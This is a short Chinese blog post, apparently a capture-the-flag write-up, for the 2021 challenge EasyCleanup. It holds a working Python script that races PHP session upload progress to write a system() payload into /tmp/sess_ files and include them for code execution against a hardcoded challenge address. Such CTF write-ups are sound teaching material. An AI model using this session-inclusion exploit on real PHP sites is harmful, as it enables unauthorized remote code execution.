[第五空间 2021]EasyCleanup

临时文件包含

当session文件名是可控的时候，可以去指定目录下访问tmp/sess_' +sessid

Py脚本

# -*- coding: utf-8 -*-
import io
import requests
import threading

myurl = 'http://1.14.71.254:28893/'
sessid = '7t0'
myfile = io.BytesIO(b'hakaiisu' * 1024)
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('tac /nssctfasdasdflag');?>"}
mycookie = {'PHPSESSID': sessid}

def writeshell(session):
    while True:
        resp = requests.post(url=myurl, data=writedata, files={'file': ('hakaiisu.txt', 123)}, cookies=mycookie)

def getshell(session):
    while True:
        payload_url = myurl + '?file=' + '/tmp/sess_' +sessid
        resp = requests.get(url=payload_url)
        if 'upload_progress' in resp.text:
            print(resp.text)
            break
        else:
            pass


if __name__ == '__main__':
    session = requests.session()
    writeshell = threading.Thread(target=writeshell, args=(session,))
    writeshell.daemon = True
    writeshell.start()
    getshell(session)

posted @ 2023-03-20 15:36 張冰冰阅读(192) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

张冰冰

[第五空间 2021]EasyCleanup

[第五空间 2021]EasyCleanup

临时文件包含

公告